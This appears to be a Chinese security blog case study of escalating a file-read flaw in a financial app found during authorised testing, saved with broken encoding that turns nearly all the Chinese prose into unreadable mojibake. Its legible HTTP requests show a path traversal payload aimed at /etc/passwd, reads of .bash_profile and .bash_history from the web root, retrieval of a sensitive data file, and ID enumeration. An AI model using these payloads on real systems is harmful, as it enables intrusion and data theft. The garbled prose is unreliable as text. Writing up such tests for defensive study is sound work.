×ðÁú¿­Ê±

֤ȯ¼ò³Æ£º×ðÁú¿­Ê± ֤ȯ´úÂ룺002212
È«Ììºò7x24Сʱ·þÎñ£º 400-777-0777

°¸Àý·ÖÏíØ­Ò»´ÎÎļþ¶ÁÈ¡Îó²îµÄ¡°Î£º¦Éý¼¶¡±Àú³Ì

ÔÚÊÚȨ²âÊÔij½ðÈÚÀàAPPʱ £¬·¢Ã÷Ò»¸ö¼¦ÀßµÍΣÎļþ¶ÁÈ¡Îó²î £¬ÊµÑ齫ÆäÉý¼¶Îª¸ßΣ ¡£·¢Ã÷Ê״η­¿ªAPPʱ £¬»áÏò·þÎñÆ÷¶ÁÈ¡Îļþ¼ÓÔØ²¢Õ¹Ê¾Í¼Æ¬ ¡£²âÊÔʱһ¶¨Òª×Ðϸ £¬±ÊÕß·¢Ã÷Ö»ÓÐÊ״η­¿ªAPPʱ £¬²Å»á¼ÓÔØÍ¼Æ¬ £¬ºóÃæÔÙ·­¿ªÓ¦¸ÃÊÇ×ÊÔ´Òѱ»¼Í¼ £¬¾Í²»»áÏò·þÎñÆ÷ÔٴξÙÐÐÇëÇóÁË ¡£

°¸Àý·ÖÏíØ­Ò»´ÎÎļþ¶ÁÈ¡Îó²îµÄ¡°Î£º¦Éý¼¶¡±Àú³Ì

Ðû²¼Ê±¼ä£º2022-11-04
ä¯ÀÀ´ÎÊý£º3439
·ÖÏí£º

ÔÚÊÚȨ²âÊÔij½ðÈÚÀàAPPʱ £¬·¢Ã÷Ò»¸ö¼¦ÀßµÍΣÎļþ¶ÁÈ¡Îó²î £¬ÊµÑ齫ÆäÉý¼¶Îª¸ßΣ ¡£

PS£º±¾ÎĽöÓÃÓÚÊÖÒÕÌÖÂÛÓëÆÊÎö £¬ÑϽûÓÃÓÚÈκβ»·¨ÓÃ; £¬Î¥ÕßЧ¹û×Ô×ð ¡£

0x00 ÆðԴ̽²â

·¢Ã÷Ê״η­¿ªAPPʱ £¬»áÏò·þÎñÆ÷¶ÁÈ¡Îļþ¼ÓÔØ²¢Õ¹Ê¾Í¼Æ¬ ¡£

²âÊÔʱһ¶¨Òª×Ðϸ £¬±ÊÕß·¢Ã÷Ö»ÓÐÊ״η­¿ªAPPʱ £¬²Å»á¼ÓÔØÍ¼Æ¬ £¬ºóÃæÔÙ·­¿ªÓ¦¸ÃÊÇ×ÊÔ´Òѱ»¼Í¼ £¬¾Í²»»áÏò·þÎñÆ÷ÔٴξÙÐÐÇëÇóÁË ¡£

´Ë¼ÓÔØÕ¹Ê¾Í¼Æ¬µÄGETÇëÇóÊý¾Ý°üÈçÏ£º

GET /ixxx/LgonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName=this_is_image.jpg HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

Äõ½Õâ¸öÊý¾Ý°üµÄµÚÒ»·´Ó¦ £¬ÒÔÍùµÄÉøÍ¸²âÊÔÂÄÀú¸æËßÎÒ £¬´ÓÕâ¸öµØ·½»òÐí·»á±£´æÎļþ¶ÁÈ¡Îó²î ¡£

ÆÊÎö²¢ÍƲ⹦ЧµãURIµÄÿ¸ö²ÎÊýµÄ¹¦Ð§ ¡£

LogonImageDir=/XXXXX/Pictures - ͼƬËùÔÚµÄĿ¼

SaveXxxxxImageName=this_is_image.jpg - Ŀ¼ÏµÄͼƬÃû

0x01 Îó²î²âÊÔ

¼ÈÈ»ÒѾ­ÆðԴ̽²âµ½ÁË¿ÉÄܱ£´æÎó²îµÄΣº¦µã £¬²¢ÇÒÎļþ¶ÁÈ¡¹¦Ð§µÄ²ÎÊýÒѾ­¸ãÇåÎú £¬ÏÂÒ»²½¾ÍÕö¿ª¶ÁÈ¡²âÊÔ ¡£

Ê×ÏȲâÊÔ £¬ÊÇ·ñ¿ÉÒÔ¾ÙÐÐĿ¼Áгö £¬Ö±½Ó½«SaveXxxxxImageName²ÎÊýÖÃ¿Õ £¬¿´¿´ÊÇ·ñ¿ÉÒÔ¶ÁÈ¡/XXXXX/PicturesĿ¼ÏµÄÄÚÈÝ£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName= HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

·µ»ØÎª¡°¿Õ¡± £¬Ê§°Ü £¬ËµÃ÷³ÌÐò¹¦Ð§µã²»±£´æÁгöĿ¼Îó²î£º

²âÊÔÊÇ·ñ¿ÉÒÔÌø³öĿ¼ £¬Ñ¡ÓÃPayloadÈçÏ£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../../../../../../etc/&SaveXxxxxImageName=passwd HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

·µ»ØÄ³ºã·À»ðǽ×èµ²½çÃæ £¬Ê§°Ü£º

½ÓÏÂÀ´½øÒ»²½²âÊÔ £¬ÊÇ/etc/passwd´¥·¢µÄWAF £¬ÕÕ¾É/../´¥·¢µÄWAF ¡£

²âÊÔÖ»¾ÙÐÐÒ»²ãÄ¿Â¼Ìø³ö £¬²¢ÇÒɾ³ý/etc/passwdÒªº¦×Ö£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../&SaveXxxxxImageName= HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

ßí...¿´À´/../µÄÌØÊâ×Ö·û¾ÍÒѾ­´¥·¢ÁËWAF£º

Ö®ºóÏ뵽ʵÑé¶ÔÊý¾Ý°ü¾ÙÐÐPOSTÀàÐÍת»» £¬Ê¹ÓÃPOST´«²ÎµÄһЩ·½·¨¾ÙÐÐWAFµÄ²âÊÔ £¬È磺

URL±àÂë

·Ö¿é´«Êä

ÔàÊý¾ÝÌî³ä

°üÌåת»»

»ûÐÎÊý¾Ý°ü

......

¿ÉÊÇÎÞÄÎ £¬POSTÇëÇóÖ±½ÓÎÞ·¨´«²Î £¬³ÌÐòÏÞÖÆÁËGETÇëÇóÎüÊÕ²ÎÊý ¡£

£¨²»¹ý £¬ØÊºó²âÊÔÆäËûPOST´«²ÎµÄ¹¦Ð§Ê± £¬·¢Ã÷ÒÔ±ÊÕßÏÖÓеÄWAFÈÆ¹ýÂÄÀú˼Ð÷ £¬»ù´¡ÎÞ·¨¶ÔijºãµÄWAF¾ÙÐÐÈÆ¹ý.....£©

0x02 Îó²îÈ·ÈÏ

×ܽáÒÔÉ϶ԴËÎļþ¶ÁÈ¡Îó²îÍøÂçµ½µÄÐÅÏ¢£º

Ŀ¼ÎÞ·¨¿çÔ½ £¬²¢ÇÒÎļþ¶ÁÈ¡µÄ·¾¶ÔÚÄ¿½ñ¸ùĿ¼£»

ÌØÊâ×Ö·û´® £¬Òѱ»WAFÍêÉÆ·À»¤× ¡£»

ÎÞ·¨»ñȡĿ¼ÏµÄÎļþÃû¡¢ÎÞ·¨Ô¤ÖªÊÇ·ñ¿ÉÒÔ¶ÁÈ¡ÆäËûºó׺Îļþ ¡£

²âÊÔµ½ÕâÀïͻȻÁé¹âÒ»ÉÁ £¬Ïëµ½ÁË¡°.bash_history¡± £¬ÈôÊÇÍøÕ¾¸ùĿ¼±£´æ´ËÎļþ £¬²¢ÇÒ¿ÉÒÔ¶ÁÈ¡ £¬ÉÏÃæµÄÒÉÎʾͿÉÒÔÖ±½Ó½â¾öÌ©°ëÁË £¬ÏÈÀ´ÏàʶһÏÂÕâЩÎļþ×÷Óãº

.bash_profile£º´ËÎļþΪϵͳµÄÿ¸öÓû§ÉèÖÃÇéÐÎÐÅÏ¢ £¬µ±Óû§µÚÒ»´ÎµÇ¼ʱ £¬¸ÃÎļþ±»Ö´ÐÐ ¡£

.bash_history£º¸ÃÎļþÉúÑÄÁËÄ¿½ñÓû§ÊäÈë¹ýµÄÀúÊ·ÏÂÁ

.bash_logout£º¸ÃÎļþµÄÓÃ;ÊÇÓû§×¢ÏúʱִÐеÄÏÂÁî £¬Ä¬ÒÔΪ¿Õ£»

.bashrc£º´ËÎļþΪÿһ¸öÔËÐÐbash shellµÄÓû§Ö´ÐдËÎļþ ¡£µ±bash shell±»·­¿ªÊ± £¬¸ÃÎļþ±»¶ÁÈ¡ ¡£

ÓÚÊÇÖ±½Ó¶ÔÍøÕ¾¸ùĿ¼¾ÙÐÐ.bash_profileµÄä²â£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_profile HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

´Ëpayload¼È×èÖ¹ÁËÌø³öĿ¼ £¬ÓֱܿªÁËWAFÑÏ´òµÄÌØÊâ×Ö·û £¬¿ÉÊÇΨһÒÅ©µÄ.bashÎļþ±»ÎÒÃÇʹÓõ½ÁË ¡£

¼¤¶¯µÄÐIJü¶¶µÄÊÖ £¬¿´À´Ä¿½ñÍøÕ¾¸ùĿ¼ȷʵÊÇ´ËÓû§µÄĿ¼ £¬²¢ÇÒÓû§Ôڴ˸ùĿ¼ÏÂÖ´ÐйýÏÂÁ

½ÓÏÂÀ´ÊµÑé½øÒ»²½À©´óΣº¦ ¡£

0x03 Σº¦Éý¼¶

²»ÇåÎúÄ¿½ñĿ¼½á¹¹ £¬¾Í´ú±í×ÅÎÞ·¨¶¨Ïò¶ÁÈ¡Îļþ £¬¿ÉÊÇÉÐÓÐÒ»¸ö.bash_historyÎÒÃÇûÓÐʹÓõ½ £¬¿´¿´ÊÇ·ñ¿ÉÒÔÔÚÆäÖлñÈ¡µ½¸üÖ÷ÒªµÄÐÅÏ¢ ¡£

¶ÁÈ¡¸ùĿ¼ÏµÄ.bash_history£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_history HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

ÐÅÏ¢Á¿ËäÈ»ÉÙ £¬¿ÉÊÇÒѾ­ÓÐÁËеÄÏ£Íû£º

ÓÉÀúÊ·ÏÂÁîµÃÖª £¬ÖÎÀíÔ±cd½øÈëÁËÁ½²ãĿ¼£º/Nxxxx/xxFile/

²¢ÇÒÉó²éÁËxx_20201022_51xxx.txtÎļþ ¡£

Ö±½Ó½á¹¹¶ÁÈ¡´ËÎļþ£¡

GET /ixxx/LogonImage.do?XxxxxImageDir=/Nxxxx/xxFile&SaveXxxxxImageName=xx_20201022_51xxx.txt HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

ÀֳɶÁÈ¡µ½ÁËÃô¸ÐµÄÊý¾ÝÐÅÏ¢£º

²¢ÇÒÎļþµÄIDֵΪʱ¼ä´Á+ID˳Ðò±àºÅ×é³É £¬¿ÉÇáËɱéÀú³öËùÓеÄÐÅÏ¢ ¡£

Burpsuite IntruderÄ £¿é²âÊÔ£º

ʵÑé±éÀú10¸öIDÖµÀÖ³É ¡£

0x04 »ØÊ××ܽá

±£´æµÄÄÑÌ⣺Ŀ¼ÎÞ·¨¿çÔ½¡¢WAF¶¢·À¡¢ÎÞ·¨Ô¤ÖªÄ¿Â¼Îļþ½á¹¹ ¡£

ÔÚ´ËÇéÐÎÏ £¬Ê¹ÓÃLinuxÎļþÏµÍ³ÌØÕ÷ £¬ÈÔÈ»¿ÉÒÔ½«µÍΣÎó²îÌáÉýÖÁ¸ßΣ ¡£

²¢ÇÒΣº¦µÄÆ·¼¶Æéá«ÊÇÎÞ·¨Ô¤¹ÀµÄ £¬ÕâÈ¡¾öÓÚ.bash_history»á¸øÎÒÃÇй¶¼¸¶àÐÅÏ¢ £¬ÒÔÊÇÎļþ¶ÁÈ¡Îó²î±£´æÊ±¼äÔ½¾Ã £¬¼Í¼µÄ¹¤¾ßÔ½¶à £¬Î£º¦Ô½´ó£¡

Òªº¦´Ê±êÇ©£º
ÍøÂçÇå¾² Îļþ¶ÁÈ¡Îó²î,
¿Í»§·þÎñÈÈÏß

400-777-0777
7*24Сʱ·þÎñ

ÁªÏµÓÊÏä

servicing@topsec.com.cn

ɨÂë¹Ø×¢
ÍøÕ¾µØÍ¼